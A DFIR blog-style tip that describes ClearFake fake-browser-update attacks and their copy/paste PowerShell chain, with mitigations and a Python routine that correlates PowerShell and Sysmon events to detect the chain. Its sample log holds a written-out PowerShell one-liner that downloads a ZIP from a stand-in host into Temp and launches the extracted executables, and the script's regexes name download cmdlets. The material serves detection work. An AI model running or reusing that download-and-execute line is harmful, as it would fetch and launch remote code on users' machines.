DFIR/DTR Tip: A New Execution Technique Using ClearFake Attack.

A new execution technique used by threat actors to evade defensive security controls in enterprises.

The technique is known as "ClearFake". It is a JavaScript framework that relies on drive-by downloads and social engineering, typically presenting fake "browser update" pages to users.

These attacks work by driving traffic to websites that are similar to legitimate ones, then presenting users with a page claiming that they need to perform a browser update to view the site’s content.

The goal is typically to get users to download malicious files, leading to data theft or deployment of further malware and persistence.

Threat actors are now using different methods to download and execute malware, moving away from embedding the malicious payload directly in the compromised site towards a relatively new technique, EtherHiding, in which the next-stage code is stored in a blockchain smart contract and fetched at runtime, so there is no conventional hosting domain to take down.

So let's go through an attack scenario.

In this scenario I explain one technique used to drop malicious PowerShell scripts.

Note: the references below cover more scenarios.

So how does this usually happen? The initial action is social engineering: a malicious "fake browser update" page is presented to the victim. This fake update page, delivered through JavaScript iframes injected into the site, uses legitimate browser branding to trick the user into downloading a fake, malicious browser update package. The payload is then downloaded onto the victim's machine.

This file or script has been packaged in different ways across campaigns and under several file extensions, ranging from Windows executables (.EXE) to Windows application packages (.APPX). The payload is a malware loader designed to conduct further malicious activity on the victim host, with capabilities ranging from information stealing to command-and-control (C2) communication.

Threat actors inject malicious script code into the target website; that code in turn downloads and executes further script payloads. The compromised websites then host the malicious script content and deliver it to victim users in "watering hole" style attacks.

A watering hole attack uses a legitimate website that has been compromised by other means or, in some cases, an impersonating (look-alike) website designed to look and feel like a site the target victim would commonly visit.

Because the website is familiar to the victim, the victim is likely to visit it frequently and interact with it, which lets the attacker exploit the victim's trust.

When users visit a compromised website, they are shown a fake browser error prompt that asks them to install a malicious "update" for their browser.

In these cases the websites belonged to legitimate businesses and were likely compromised through vulnerabilities that allowed code to be injected. The error prompt instructs the user to manually execute malicious PowerShell code. The chain of events is as follows:

  1. The user visits a compromised website that references the attacker-controlled domain, which produces the fake update prompt.
  2. The user copies the malicious PowerShell code from the prompt into a PowerShell console and executes it.
  3. The pasted code drops a second PowerShell script; once that script runs successfully, a ZIP archive is downloaded into the Temp directory under the user's profile.
  4. The PowerShell script extracts the ZIP contents and executes any file with the ".exe" extension. In the observed case this launches the legitimate "file.exe" program, which loads the malicious DLL "file.dll" placed beside it (DLL side-loading); the DLL installs the C2 framework.

So now let’s suggest some mitigation and detection rules:

  • Deploy application control policies to restrict PowerShell script execution to the users who need it for their job functions, and enable PowerShell script block logging (event ID 4104) so that pasted code is recorded even when it never touches disk.
  • Enhance user awareness by notifying users, IT personnel, and security teams about this ongoing campaign and technique.
  • Remind users of the threat of copying and executing code from untrusted sources.
  • Regularly update and patch websites and third-party tools used in sites to prevent the exploitation of vulnerabilities that could allow code injection and unauthorized script execution.
  • This campaign is a good case for an EDR watchlist: correlating the pasted script block, the ZIP written to Temp, the .exe launched from Temp and the DLL it loads lets the detection team see the entire attack chain and understand what happened after the original copy/paste code ran.
  • Monitoring and blocking ClearFake-associated domains is one of the best ways to protect your users. Remember that once a victim is on the social engineering page, they are only a few clicks away from running malicious code that could bypass your defenses.
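As an added example (not code from the original article), here is a small Python correlation routine that models the EDR watchlist idea above and the four-step chain described earlier. It runs over a few constructed JSON-lines events shaped like PowerShell script block logging (event 4104) and Sysmon process-create (event 1) and image-load (event 7) records, and reports which stages of the chain were seen on each host. The field names, host names, file paths and sample log lines are all assumptions constructed for this example; tune the regular expressions to your own telemetry.

```python
"""Correlate the copy/paste PowerShell -> ZIP in Temp -> DLL side-load chain.

Constructed example: the event shapes, field names and sample lines below
are assumptions modelled on PowerShell 4104 and Sysmon 1/7 records, not real
telemetry from the campaign.
"""
import json
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Stage 1: a single script block that downloads into the user's Temp
# directory, extracts an archive there and launches what came out of it.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|net\.webclient|start-bitstransfer", re.I)
TEMP_RE = re.compile(r"\$env:temp\b|\\appdata\\local\\temp\\", re.I)
EXTRACT_RE = re.compile(r"expand-archive|extracttodirectory", re.I)
LAUNCH_RE = re.compile(r"start-process|invoke-item|\*\.exe", re.I)

# Stages 2 and 3: binaries running from, and DLLs loaded from, Temp.
TEMP_PATH_RE = re.compile(r"\\appdata\\local\\temp\\", re.I)


def is_dropper_script(text):
    """True only when all four behaviours appear in one script block."""
    return all(p.search(text) for p in (DOWNLOAD_RE, TEMP_RE, EXTRACT_RE, LAUNCH_RE))


def same_dir(path_a, path_b):
    """Case-insensitive check that two Windows paths share a parent directory."""
    return PureWindowsPath(path_a.lower()).parent == PureWindowsPath(path_b.lower()).parent


def find_chains(lines):
    """Group events by host and report which stages of the chain were observed."""
    events = [json.loads(line) for line in lines if line.strip()]
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)

    findings = []
    for host, evs in sorted(by_host.items()):
        stages = set()
        for e in evs:
            if e["event_id"] == 4104 and is_dropper_script(e["ScriptBlockText"]):
                stages.add("1-pasted-dropper")
            elif (e["event_id"] == 1 and TEMP_PATH_RE.search(e["Image"])
                  and e["ParentImage"].lower().endswith("\\powershell.exe")):
                stages.add("2-temp-exe-from-powershell")
            elif (e["event_id"] == 7 and e["Signed"].lower() == "false"
                  and TEMP_PATH_RE.search(e["ImageLoaded"])
                  and same_dir(e["Image"], e["ImageLoaded"])):
                stages.add("3-unsigned-dll-sideload")
        if stages:
            # Each stage alone is noisy; the full chain on one host is the campaign shape.
            severity = {1: "low", 2: "medium", 3: "high"}[len(stages)]
            findings.append({"host": host, "stages": sorted(stages), "severity": severity})
    return findings


# Constructed sample log: WS01 shows the whole chain, WS02 is benign noise.
SAMPLE_LOG = r"""
{"host":"WS01","event_id":4104,"ScriptBlockText":"$z=\"$env:TEMP\\update.zip\"; iwr http://update.example.invalid/u.zip -OutFile $z; Expand-Archive $z \"$env:TEMP\\upd\" -Force; gci \"$env:TEMP\\upd\" -Filter *.exe | % { Start-Process $_.FullName }"}
{"host":"WS01","event_id":1,"Image":"C:\\Users\\alice\\AppData\\Local\\Temp\\upd\\file.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"}
{"host":"WS01","event_id":7,"Image":"C:\\Users\\alice\\AppData\\Local\\Temp\\upd\\file.exe","ImageLoaded":"C:\\Users\\alice\\AppData\\Local\\Temp\\upd\\file.dll","Signed":"false"}
{"host":"WS02","event_id":4104,"ScriptBlockText":"Get-ChildItem $env:TEMP -Filter *.log | Remove-Item"}
{"host":"WS02","event_id":1,"Image":"C:\\Program Files\\Git\\bin\\git.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"}
"""

if __name__ == "__main__":
    for finding in find_chains(SAMPLE_LOG.splitlines()):
        print(json.dumps(finding))
```

The reason to correlate rather than alert on each stage separately is that Expand-Archive, or an executable launched from Temp, is common on its own; all three on one host is the copy/paste shape described in steps 2 to 4. The 4104 script block is the earliest signal in the chain, which is why script block logging needs to be enabled before the campaign reaches you.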

References:

Happy Investigation and Detection
